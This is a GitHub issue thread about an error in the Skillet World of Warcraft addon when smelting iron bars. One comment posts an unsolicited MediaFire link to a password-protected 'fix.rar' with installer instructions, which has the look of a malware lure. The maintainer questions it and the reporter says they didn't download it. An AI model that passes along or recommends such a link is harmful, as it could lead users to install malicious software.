### ISSUE TITLE
Skillet 5.32 - "Skillet has been blocked from an action only available to the Blizzard UI" when trying to smelt

### ISSUE THREAD

**Issue by synthosomatic** [b-morgan/Skillet#97]
"Skillet has been blocked from an action only available to the Blizzard UI" when trying to smelt.
I am already on the Mining screen, and attempting to both create and process are producing the same error.
Chat output: Skillet: Changing profession to nil Press Process to continue

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by b-morgan** [comment]
@synthosomatic, I need more information, i.e. the specific recipe you are trying to create. Perhaps a screenshot that includes the error.

@wolone, I have no idea what you are trying to do. If you wish to contribute something to this issue, please zip it and attach it here. If you have a fix for this issue, you can also create a pull request.

**Comment by synthosomatic** [comment]
It was iron bars, and the issue seems to have gone away mysteriously.
I did not download whatever it was that other person linked.
